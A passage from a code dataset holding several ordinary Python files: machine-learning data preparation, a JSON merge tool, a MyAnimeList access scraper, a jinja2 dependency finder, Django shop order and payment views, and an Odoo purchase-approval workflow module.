train_set_panda[clm].replace(cat_vals,numerical_vals )\n\n else:\n train_set_panda[clm] = train_set_panda[clm].fillna(train_set_panda['LotFrontage'].mean())\n\n\n\n # removing Alley, PoolQC, Fence, MiscFeature because of the nan values\n train_set_panda.drop('Alley', inplace=True, axis=1)\n train_set_panda.drop('PoolQC', inplace=True, axis=1)\n train_set_panda.drop('Fence', inplace=True, axis=1)\n train_set_panda.drop('MiscFeature', inplace=True, axis=1)\n train_set_panda['LotFrontage'] = train_set_panda['LotFrontage'].fillna(train_set_panda['LotFrontage'].mean())\n train_set_panda['GarageYrBlt'] = train_set_panda['GarageYrBlt'].fillna(train_set_panda['GarageYrBlt'].mean())\n \n return train_set_panda\n\n\ndef abnormal(train_set_panda, test_size, contamination):\n \n \"\"\"\n take panda dataframe that contains X and y and split them into numpy arrays \n - do the split based on the test size\n - apply abnormal detection based on contamination\n - return X_train, y_train, X_test, y_test\n \n \"\"\"\n \n \n X_train = np.array(train_set_panda)[:,0:np.array(train_set_panda).shape[1]-1]\n Y_train = np.array(train_set_panda)[:,np.array(train_set_panda).shape[1]-1]\n\n # split the training set into testing and training \n X_train, X_test, y_train, y_test = train_test_split(X_train,Y_train, test_size = test_size)\n\n iso = IsolationForest(contamination = contamination)\n yhat = iso.fit_predict(X_train)\n mask = yhat != -1\n X_train, y_train = X_train[mask, :], y_train[mask]\n \n return X_train, X_test, y_train, y_test\n\n\ndef visualize_pca(X_train,X_test):\n \"\"\"\n convert the data into two dimension and visualize in a scatter plot for training and testing without \n the y values\n \"\"\"\n pca_train = PCA(n_components = 2)\n pca_train.fit(X_train)\n plt.scatter(pca_train.transform(X_train)[:,0], pca_train.transform(X_train)[:,1])\n\n # testing dataset (orange)\n pca_test = PCA(n_components = 2)\n pca_test.fit(X_test)\n plt.scatter(pca_test.transform(X_test)[:,0], pca_test.transform(X_test)[:,1])\n \n plt.xlabel(\"X pca\")\n plt.ylabel(\"Y pca\")\n plt.legend([\"Training Dat\", \"Testing Data\"])\n \ndef prep_dataloader(X_train,X_test, y_train, y_test, batch_size):\n # preprocessing for pytorch as a tensor\n prep_train_set = []\n for i in range(X_train.shape[0]):\n prep_train_set.append((X_train[i,:], y_train[i]))\n prep_test_set = []\n for i in range(X_test.shape[0]):\n prep_test_set.append((X_test[i,:], y_test[i]))\n train_data_loader = torch.utils.data.DataLoader(prep_train_set, batch_size= batch_size, shuffle=False)\n test_data_loader = torch.utils.data.DataLoader(prep_test_set, batch_size= batch_size, shuffle=False)\n \n return train_data_loader, test_data_loader\n","repo_name":"Naiftt/NNvsXGBOOST","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74636648409","text":"import sys, argparse, json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--file1',help='input match file')\nparser.add_argument('--file2',help='additional match file')\nparser.add_argument('--outfile',help='output file')\nargs = parser.parse_args()\n\ndef concat(filein,fileout,maxm=-1):\n json_in = {}\n json_out = {}\n try:\n with open(filein,'r') as fin:\n json_in = json.load(fin)\n except:\n logger.info('cannot load pre-existing JSON file=',filein)\n try:\n with open(fileout,'r') as fin:\n json_out = json.load(fin)\n except:\n logger.info('cannot load pre-existing JSON file=',fileout)\n n = 0\n for j in json_in:\n skip = False\n for ji in json_out:\n if ji['input']['img'] == j['input']['img']:\n skip = True\n break\n if not skip:\n json_out.append(j)\n n = n + 1\n if maxm != -1 and n > maxm:\n return\n with open(args.outfile,'w') as outf:\n json.dump(json_out,outf)\n\nconcat(args.file1,args.file2) # concats file2 at the top of file1 into file2\n","repo_name":"jolibrain/recognition","sub_path":"ai/tools/match_concat.py","file_name":"match_concat.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"18215268419","text":"import os\nimport time\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\n\nANIME_LINK = 'https://myanimelist.net/animelist/'\nMANGA_LINK = 'https://myanimelist.net/mangalist/'\nIN_FILE = f'{os.getcwd()}/data/sampled-username.list'\nOUT_FILE = f'{os.getcwd()}/data/sampled-access.csv'\nUSERS = []\n\ndef soupify(link):\n\tpage = requests.get(link)\n\treturn BeautifulSoup(page.content, 'html.parser')\n\ndef has_access(link):\n\t# 1. check if badresult, e.g. ryuu_zake\n\t# 2. check if data table exist, e.g. MisterJohnMan\n\tsoup = soupify(link)\n\t\n\t# first check\n\tbadresult = soup.find('div', {'class': 'badresult'})\n\tif badresult:\n\t\tprint(f'Bad result on {link}')\n\t\treturn 0\n\n\t# second check\n\tdata_table = soup.find('tr', {'class': 'list-table-data'})\n\tif not data_table:\n\t\tprint(f'Data table does not exist on {link}')\n\t\treturn 0\n\n\treturn 1\n\ndef load_users(PATH = IN_FILE):\n\twith open(PATH, 'r') as f:\n\t\tfor line in f:\n\t\t\tUSERS.append(line.strip())\n\n\treturn USERS\n\nif __name__ == '__main__':\n\t# load data here\n\tusers = load_users()\n\n\t# prep out file\n\twith open(OUT_FILE, 'w') as f:\n\t\theaders = 'username,anime_access,manga_access'\n\t\tf.write(headers)\n\n\t# loop over\n\tfor username in tqdm(users):\n\t\taccess = {'animelist': None, 'mangalist': None}\n\n\t\taccess['animelist'] = has_access(ANIME_LINK + username)\n\t\ttime.sleep(2)\n\n\t\t# if got no access to anime, skip access to manga too\n\t\tif not access['animelist']:\n\t\t\tcontinue\n\n\t\taccess['mangalist'] = has_access(MANGA_LINK + username)\n\t\ttime.sleep(2)\n\n\t\t# if got no access to manga, skip dump\n\t\tif not access['mangalist']:\n\t\t\tcontinue\n\t\t\n\t\t# dump\n\t\twith open(OUT_FILE, 'a') as f:\n\t\t\tf.write(f\"\\n{username},{access['animelist']},{access['mangalist']}\")\n","repo_name":"vioxcd/mals-scraper-eda","sub_path":"scraping-scripts/check-list-access.py","file_name":"check-list-access.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33056162432","text":"from os.path import join, exists, abspath\nfrom jinja2 import meta\n\n__version__ = '1.0.0'\n\ndef find_file_in_dirs(filename, dirs, error_on_multiple = False):\n found = []\n for d in dirs:\n fn = join(d, filename)\n if exists(fn):\n if error_on_multiple:\n if fn not in found:\n found.append(fn)\n else:\n return abspath(fn)\n if error_on_multiple:\n if len(found) > 1:\n raise Exception(\"File '%s' matched several locations: %s\" % found)\n if len(found) == 1:\n return abspath(found[0])\n return None\n\n# pylint: disable=W0102\ndef find_dependencies(input_file, templatedirs, env, exceptions=[]):\n \"\"\"\n Find jinja2 dependency list. Files listed in 'exceptions' do not\n generate exceptions if not found.\n \"\"\"\n\n total_set = set()\n\n def find_dependencies_recurse(file_path):\n new_deps = []\n\n # Parse the file and extract the list of references\n\n with open(file_path, \"r\") as f:\n ast = env.parse(f.read().decode('utf-8'))\n\n # For each reference, find the absolute path. If no file\n # is found and the reference was not listed in exceptions,\n # throw an error.\n\n for reference in meta.find_referenced_templates(ast):\n reference_path = find_file_in_dirs(reference, templatedirs)\n if reference_path is None:\n if reference in exceptions:\n continue\n raise Exception(\"cannot find file '%s' referenced in \"\n \"'%s'\" % (reference, file_path))\n new_deps.append(reference_path)\n\n for dep in new_deps:\n # Make sure we don't have a circular reference\n if dep not in total_set:\n total_set.add(dep)\n find_dependencies_recurse(dep)\n return\n\n top_file = find_file_in_dirs(input_file, templatedirs)\n if top_file is None:\n raise Exception(\"cannot find file '%s'\" % input_file)\n total_set.add(top_file)\n find_dependencies_recurse(top_file)\n\n sorted_total = []\n for x in total_set:\n sorted_total.append(x)\n\n sorted_total.sort()\n return sorted_total\n# pylint: enable=W0102\n","repo_name":"turbulenz/turbulenz_tools","sub_path":"turbulenz_tools/utils/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"31"} +{"seq_id":"10980623629","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom .cart import Cart\nfrom home.models import Product\nfrom .forms import CardAddForm, CouponApplyForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Order, OrderItem, Coupon\nimport requests\nfrom django.conf import settings\nimport json\nfrom django.http import HttpResponse\nimport datetime\nfrom django.contrib import messages\n\n\nclass CartView(View):\n def get(self, request):\n cart = Cart(request)\n return render(request, \"orders/cart.html\", {\"cart\": cart})\n\n\nclass CardAddView(View):\n def post(self, request, product_id):\n cart = Cart(request)\n product = get_object_or_404(Product, id=product_id)\n form = CardAddForm(request.POST)\n if form.is_valid():\n cart.add(product, form.cleaned_data[\"quantity\"])\n return redirect(\"orders:cart\")\n\n\nclass CartRemoveView(View):\n def get(self, request, product_id):\n cart = Cart(request)\n product = get_object_or_404(Product, id=product_id)\n cart.remove(product)\n return redirect(\"orders:cart\")\n\n\nclass OrderDetailView(LoginRequiredMixin, View):\n form_class = CouponApplyForm\n\n def get(self, request, order_id):\n order = get_object_or_404(Order, id=order_id)\n return render(\n request, \"orders/order.html\", {\"order\": order, \"form\": self.form_class}\n )\n\n\nclass OrderCreateView(LoginRequiredMixin, View):\n def get(self, request):\n cart = Cart(request)\n order = Order.objects.create(user=request.user)\n for item in cart:\n OrderItem.objects.create(\n order=order,\n product=item[\"product\"],\n price=item[\"price\"],\n quantity=item[\"quantity\"],\n )\n cart.clear()\n return redirect(\"orders:order_detail\", order.id)\n\n\nif settings.SANDBOX:\n sandbox = \"sandbox\"\nelse:\n sandbox = \"www\"\n\n\nZP_API_REQUEST = f\"https://{sandbox}.zarinpal.com/pg/rest/WebGate/PaymentRequest.json\"\nZP_API_VERIFY = (\n f\"https://{sandbox}.zarinpal.com/pg/rest/WebGate/PaymentVerification.json\"\n)\nZP_API_STARTPAY = f\"https://{sandbox}.zarinpal.com/pg/StartPay/\"\n\ndescription = \"توضیحات مربوط به تراکنش را در این قسمت وارد کنید\" # Required\n# Optional\n# Important: need to edit for realy server.\nCallbackURL = \"http://127.0.0.1:8080/orders/verify/\"\nAmount = str(Order.get_total_price)\n\n\nclass OrderPayView(LoginRequiredMixin, View):\n def get(self, request, order_id):\n order = Order.objects.get(id=order_id)\n request.session[\"orderpay\"] = {\"order_id\": order_id}\n data = {\n \"MerchantID\": settings.MERCHANT,\n \"Amount\": Amount,\n \"Description\": description,\n \"CallbackURL\": CallbackURL,\n }\n headers = {\"accept\": \"application/json\", \"content-type\": \"application/json\"}\n\n req = requests.post(url=ZP_API_REQUEST, data=json.dumps(data), headers=headers)\n\n authority = req.json()[\"data\"][\"authority\"]\n if len(data.json()[\"errors\"]) == 0:\n return redirect(ZP_API_STARTPAY.format(authority=authority))\n else:\n e_code = data.json()[\"errors\"][\"code\"]\n e_message = data.json()[\"errors\"][\"message\"]\n return HttpResponse(f\"Error code: {e_code}, Error Message: {e_message}\")\n\n\nclass OrderVerifyView(LoginRequiredMixin, View):\n def get(self, request, authority):\n order_id = request.session[\"order_pay\"][\"ordeer_id\"]\n order = Order.objects.get(id=int(order_id))\n data = {\n \"MerchantID\": settings.MERCHANT,\n \"Amount\": Amount,\n \"Authority\": authority,\n }\n data = json.dumps(data)\n # set content length by data\n headers = {\"content-type\": \"application/json\", \"content-length\": str(len(data))}\n response = requests.post(ZP_API_VERIFY, data=data, headers=headers)\n\n if response.status_code == 200:\n response = response.json()\n if response[\"Status\"] == 100:\n return {\"status\": True, \"RefID\": response[\"RefID\"]}\n else:\n return {\"status\": False, \"code\": str(response[\"Status\"])}\n return response\n\n\nclass CouponApplyView(LoginRequiredMixin, View):\n form_class = CouponApplyForm\n\n def post(self, request, order_id):\n now = datetime.datetime.now()\n form = self.form_class(request.POST)\n if form.is_valid():\n code = form.cleaned_data[\"code\"]\n try:\n coupon = Coupon.objects.get(\n code__exact=code,\n valid_from__lte=now,\n valid_to__gte=now,\n active=True,\n )\n except Coupon.DoesNotExist:\n messages.error(request, \"this coupon does not exist\", \"danger\")\n return redirect(\"orders:order_detail\", order_id)\n order = Order.objects.get(id=order_id)\n order.discount = coupon.discount\n order.save()\n return redirect(\"orders:order_detail\", order_id)\n","repo_name":"pooyajjj/Django_store","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34709452735","text":"# -*- encoding: utf-8 -*-\n\nfrom odoo import api , fields, models, _\nimport time\nfrom datetime import datetime\nfrom odoo import netsvc\n\n\n\nclass demande_achat(models.Model):\n _name=\"purchase.exp.achat\"\n _logger = netsvc.Logger()\n _description=\"Demande d'achat\"\n _order = \"name desc\"\n \n \n def _get_montant_achat(self,cr,uid,ids,field,args,context=None) :\n res={}\n for achat in self.browse(cr,uid,ids,context) :\n cpt=0\n for det in achat.line_det_ids :\n cpt += det.subtotal\n res[achat.id] = cpt\n return res\n \n \n def onchange_quotation_id(self, cr, uid, ids, quotation_id):\n if not quotation_id:\n return {}\n quo = self.pool.get('purchase.order').browse(cr, uid, quotation_id)\n return {'value': {'pricelist_id': quo.pricelist_id.id,\n },\n \n }\n \n \n def onchange_sale_id(self, cr, uid, ids, sale_id):\n if not sale_id:\n return {}\n sale = self.pool.get('sale.order').browse(cr, uid, sale_id)\n return {'value': {'sale_pricelist_id': sale.pricelist_id.id,\n },\n \n }\n \n def _user_mail_get(self, cr, uid, ids, context=None):\n results = self.pool.get('res.users').read(cr, uid, [uid],['email'])\n if results:\n return results[0]['email']\n return False \n \n \n def _get_devise(self, cr, uid, ids, field, arg, context=None):\n res={}\n for demande in self.browse(cr,uid,ids) :\n devise = demande .pricelist_id.currency_id.symbol\n res[demande.id] = devise\n return res\n \n \n def _get_amount_untaxed(self, cr, uid, ids, field, arg, context=None):\n res={}\n amount_untaxed = 0.00\n \n for achat in self.browse(cr, uid, ids) :\n for line in achat.line_det_ids :\n amount_untaxed += line.subtotal\n \n res[achat.id] = amount_untaxed\n \n return res\n \n \n def _get_amount_tax(self, cr, uid, ids, field, arg, context=None):\n res={}\n amount_tax = 0.00\n \n for achat in self.browse(cr, uid, ids) :\n for line in achat.line_det_ids :\n if line.taxe_id :\n amount_tax += line.subtotal * line.taxe_id.amount\n \n res[achat.id] = amount_tax\n \n return res\n \n \n def _get_amount_total(self, cr, uid, ids, field, arg, context=None):\n res={}\n \n for achat in self.browse(cr, uid, ids) :\n amount_untaxed = 0.00\n amount_tax = 0.00\n for line in achat.line_det_ids :\n amount_untaxed += line.subtotal\n if line.taxe_id :\n amount_tax += line.subtotal * line.taxe_id.amount\n \n res[achat.id] = amount_untaxed + amount_tax\n \n return res\n \n \n \n _columns={\n 'name':fields.char('Référence',128,required=True,states={'done':[('readonly',True)]}),\n 'date':fields.date('Date', help='Date',states={'done':[('readonly',True)]}),\n 'date_prevue':fields.datetime('Date', help='Date prévue',states={'done':[('readonly',True)]}),\n 'demandeur_id':fields.many2one('hr.employee', 'Demandeur', required=False, readonly=True, help='Employé en charge de la demande selectionné automatiquement'),\n 'user_id':fields.many2one('res.users', 'Validateur', required=True),\n 'pricelist_id':fields.many2one('product.pricelist', \"Liste de prix d'achat\", required=True,states={'done':[('readonly',True)]}),\n 'location_id':fields.many2one('stock.location', 'Emplacement source', required=True,states={'done':[('readonly',True)]}),\n 'location_dest_id':fields.many2one('stock.location', 'Emplacement destination', required=True,states={'done':[('readonly',True)]}),\n 'notes': fields.text('Commentaires',states={'done':[('readonly',True)]}),\n 'projet': fields.char('Projet'),\n 'line_det_ids':fields.one2many('purchase.exp.achat.detail', 'demande_id', 'Détail demande', required=False,states={'done':[('readonly',True)]}),\n 'bon_sortie_ids':fields.one2many('purchase.exp.sortie', 'achat_id', 'Bon de sortie',states={'done':[('readonly',True)]}),\n 'commentaire_ids':fields.one2many('purchase.exp.commentaire','order_id', required=False),\n 'demande_id':fields.many2one('purchase.exp.besoin', 'Référence du Besoin', required=False, ondelete=\"cascade\", readonly=True),\n 'quotation_id':fields.many2one('purchase.order', 'Devis Fournisseur', required=False, states={'done':[('readonly',True)]}),\n 'sale_id':fields.many2one('sale.order', 'Devis Client', required=False, states={'done':[('readonly',True)]}),\n 'alerte_mail':fields.boolean(\"Envoi de mail\", help=\"Si coché, permet d'envoyer automatiquement un e-mail d'alerte au responsable après la confirmation de la demande d'achat pour validation\",states={'done':[('readonly',True)]}),\n 'mail_user':fields.function(_user_mail_get, method=True, type='char', string='Mail user'), \n 'notes_finance': fields.text('Commentaires finance',states={'done':[('readonly',True)]}),\n 'devise':fields.function(_get_devise, method=True, type='char', string='Devise'), \n 'currency_id': fields.related('pricelist_id', 'currency_id', type=\"many2one\", relation=\"res.currency\", string=\"Currency\", readonly=True, required=True),\n 'dg':fields.boolean('DG'),\n 'finance':fields.boolean('Finance'),\n 'amount_untaxed': fields.function(_get_amount_untaxed, method=True, type='float', string='Montant hors-taxe'),\n 'amount_tax': fields.function(_get_amount_tax, method=True, type='float', string='Taxe'),\n 'amount_total': fields.function(_get_amount_total, method=True, type='float', string='Total'),\n 'type_demande':fields.selection([\n ('general','Général'),\n ('achat','Général direct'),\n ('technique','Technique'),\n ('divers','Dépenses diverses'),\n ], 'Type de demande', select=True, readonly=True,states={'done':[('readonly',True)]}),\n 'mtt_achat':fields.function(_get_montant_achat,\n method=True,\n type='float',\n string='Montant', help='Montant évalué du besoin'),\n 'state':fields.selection([('draft','Brouillon'),\n ('draft_tech','Brouillon'),\n ('service','Service'),\n ('departement','Département'),\n ('finance','Finance'),\n ('finance_ach','Finance'),\n ('finance_cai','Finance'),\n ('direction','Direction'),\n ('achat','Achat'),\n ('caisse','Caisse'),\n ('commande','Commande'),\n ('bon','BS émis'),\n ('done','Terminé')],'Statut',readonly=True,required=True,states={'done':[('readonly',True)]}\n ),\n 'message_ids':fields.one2many('mail.message','res_id','Message',required=False),\n }\n \n _sql_constraints = [\n ('name_uniq', 'unique(demande_id)', \"La reférence de l'expression de besoin doit être unique\"),\n ]\n\n def _user_get(self, cr, uid, context=None):\n ids = self.pool.get('res.users').search(cr, uid, [('id', '=', uid)], context=context)\n if ids:\n return ids[0]\n return False\n \n def _get_notification(self, cr, uid, ids, model, name, body, subject, object_id, user_id, demande, context=None):\n besoin_obj = self.pool.get('purchase.exp.besoin')\n besoin_obj._get_notification(cr, uid, ids, model, demande.name, body, subject, object_id, user_id, context)\n return True\n \n def notif_mail(self, cr, uid, ids, user_from, user_to, subject, mail, demande):\n url1 = \"http://erp:8069/?db=TALENTYS#id=\"\n url2 = \"&view_type=form&model=purchase.exp.achat&menu_id=614&action=780\"\n url = url1 + str(demande.id) + url2\n if demande.alerte_mail :\n if not demande.demandeur_id.work_email :\n raise osv.except_osv('Warning',\"Veuiller renseigner l'adresse mail du demandeur\")\n if not demande.demandeur_id.parent_id.work_email :\n raise osv.except_osv('Warning',\"Veuiller renseigner l'adresse mail du responsable du demandeur\")\n \n mail = mail + \"\\n\\n\" + url\n ir_mail_server = self.pool.get('ir.mail_server')\n msg = ir_mail_server.build_email(user_from, [user_to], subject, mail)\n ir_mail_server.send_email(cr, uid, msg)\n \n return True\n \n \n def action_draft(self,cr,uid,ids,context=None):\n \n for achat in self.browse(cr, uid, ids) :\n if achat.alerte_mail :\n user = self.pool.get('res.users').read(cr, uid, [uid],['name'])[0]['name']\n message = \"\"\"Bonjour M/Mme\\n\\n Votre demande d'achat a été mise en brouillon. \\n\\nCordialement !\\n\\n\"\"\"\n titre = 'Demande d\\'achat %s : Mise en brouillon par %s' % (achat.name, user)\n emetteur = 'openerp@talentys.ci'\n self.notif_mail(cr, uid, ids, emetteur, achat.demandeur_id.work_email, titre, message, achat)\n \n results = self.pool.get('res.users').read(cr, uid, [uid],['technicien'])\n technicien = False\n if results:\n technicien = results[0]['technicien']\n \n if technicien :\n return self.write(cr,uid,ids,{'state':'draft_tech'})\n else :\n return self.write(cr,uid,ids,{'state':'draft'})\n \n \n \n def button_dummy(self, cr, uid, ids, context=None):\n return True \n\n\n def action_service(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Demande d'achat transmise au Chef de Service Support pour validation

    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n \n message = \"\"\"Bonjour M/Mme\\n\\nJe vous prie de bien vouloir valider ma demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n self.notif_mail(cr, uid, ids, demande.demandeur_id.work_email, demande.demandeur_id.parent_id.work_email, 'Expression de besoin : Validée par le Chef de Service', message, demande)\n \n return self.write(cr,uid,ids,{'state':'service'})\n \n def action_departement(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n \n if demande.demandeur_id.user_id.id == uid and demande.demandeur_id.user_id.technicien == True and demande.demandeur_id.manager == False:\n raise osv.except_osv('Warning', _('Vous n\\'êtes pas autorisé à valider cette demande, Veuillez vous référer à votre chef de service '))\n \n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Demande d'achat transmise au Chef du Département pour validation

    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nJe vous prie de bien vouloir valider la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n self.notif_mail(cr, uid, ids, demande.demandeur_id.work_email, demande.demandeur_id.parent_id.work_email, \"Demande d'achat : En attente de validation\", message, demande)\n return self.write(cr,uid,ids,{'state':'departement'})\n \n \n def action_finance(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Demande d'achat transmise au Responsable des Finances pour validation

    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nJe vous prie de bien vouloir valider la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_dep_finance', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : En attente de validation\", message, demande)\n \n if demande.state == 'direction' : \n self.write(cr, uid, ids, {'dg' : True})\n if demande.type_demande in ('general', 'technique', 'achat') :\n self.write(cr, uid, ids, {'state' : 'finance_ach'})\n else : \n self.write(cr,uid,ids,{'state':'finance_cai'})\n else :\n return self.write(cr,uid,ids,{'state':'finance'})\n \n \n \n def action_direction(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Demande d'achat transmise au Directeur Général pour validation

    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nMerci de bien vouloir prendre en compte la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_direction_gle', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : En attente de validation\", message, demande)\n return self.write(cr,uid,ids,{'state':'direction',\n 'finance': True})\n \n def action_achat(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n if demande.type_demande == 'divers' :\n raise osv.except_osv(_('Warning'),_('Les demandes de type Dépense diverses doivent être transmises à la caisse'))\n \n if not demande.dg :\n raise osv.except_osv(_('Warning'),_('La demande doit être d\\'abord validée par la Direction Générale !'))\n \n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Demande d'achat transmise au responsable des achats pour émission du Bon de Commande

    \", \"Demande d'achat\", demande.id, demande.user_id.id, demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nMerci de bien vouloir prendre en compte la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_sce_achat', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : Validée par le Département des Finances\", message, demande)\n \n return self.write(cr,uid,ids,{'state':'achat'})\n \n \n def action_caisse(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n if demande.type_demande == 'achat' :\n raise osv.except_osv(_('Warning'),_('Les demandes de type Dépense diverses achat doivent être transmises aux achats'))\n \n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Demande d'achat transmise à la caisse pour paiement

    \", \"Demande d'achat\", demande.id, demande.user_id.id, demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nMerci de bien vouloir prendre en compte la demande d'achat ci-dessous pour paiement.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_sce_caisse', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : Validée par le Département des Finances\", message, demande)\n return self.write(cr,uid,ids,{'state':'caisse'})\n \n \n def action_commande(self,cr,uid,ids,context=None):\n for achat in self.browse(cr,uid,ids) :\n if not achat.quotation_id :\n raise osv.except_osv('Erreur','Veuillez selectionner un devis fournisseur')\n self.pool.get('purchase.order').wkf_approve_order(cr, uid, [achat.quotation_id.id])\n self.pool.get('purchase.order').action_picking_create(cr, uid, [achat.quotation_id.id])\n \n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Emission du Bon de Commande au fournisseur

    \" + demande.quotation_id.partner_id.name, \"Bon de Commande\", demande.id, demande.user_id.id, demande, context)\n return self.write(cr,uid,ids,{'state':'commande'})\n \n def action_cotation(self,cr,uid,ids,context=None):\n obj_cotation = self.browse(cr,uid,ids,context)\n obj_purchase_order = self.pool.get('purchase.order')\n obj_purchase_order_line = self.pool.get('purchase.order.line')\n obj_bon = self.pool.get('purchase.exp.sortie')\n \n cr.execute(\"\"\"SELECT product_id,sum(product_qty),p.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\n FROM purchase_exp_achat p,purchase_exp_achat_detail dp,product_product pdt\n WHERE p.id=dp.demande_id\n and pdt.id=dp.product_id\n GROUP BY product_id,p.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\"\"\")\n produits = cr.fetchall()\n \n four = {}\n for demande in self.browse(cr,uid,ids,context):\n #test = _unique(cotation.cotation_ids)\n \n def unique():\n found = set([])\n keep = []\n \n for dmde_achat in demande.line_det_ids :\n if dmde_achat.partner_id.id not in found:\n found.add(dmde_achat.partner_id.id)\n keep.append(dmde_achat.partner_id.id)\n \n return keep\n \n \"\"\"\"id_offre = 0\n if cotation.appel_offre :\n offre = {\n 'date_start': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'state': 'draft',\n 'exclusive': 'multiple',\n 'company_id': self.pool.get('res.company')._company_default_get(cr, uid, 'purchase.requisition', context=context),\n 'user_id': uid,\n 'name': self.pool.get('ir.sequence').get(cr, uid, 'purchase.order.requisition'),\n }\n id_offre = obj_offre.create(cr, uid, offre, context=context)\"\"\"\n \n four = unique()\n for frs in four:\n reference = self.pool.get('ir.sequence').get(cr, uid, 'purchase.order')\n order_data = {\n 'name': reference,\n 'date_order': time.strftime('%Y-%m-%d'),\n 'state': 'draft',\n 'partner_id': frs,\n #'partner_address_id': self.pool.get('res.partner').search(cr,uid,[('partner_id','=',frs)])[0],\n 'pricelist_id': demande.pricelist_id.id,\n 'location_id':demande.location_id.id,\n 'invoice_method':'order',\n #'requisition_id':id_offre,\n }\n id = obj_purchase_order.create(cr, uid, order_data, context=context)\n line = \"\"\n for pdt in produits :\n if pdt[2]==demande.id and pdt[7]==frs:\n line_data = {\n 'product_id': pdt[0],\n 'product_qty': pdt[1],\n 'product_uom': pdt[3],\n 'name': pdt[6],\n 'date_planned': time.strftime('%Y-%m-%d'),\n 'price_unit': pdt[4],\n 'order_id': id\n }\n #line = line + str(pdt[5]) + ' ' + str(pdt[6]) + \"\\n\"\n obj_purchase_order_line.create(cr, uid, line_data, context=context)\n \n return self.write(cr,uid,ids,{'state':'cotation'})\n \n def action_done(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Demande d'achat terminée

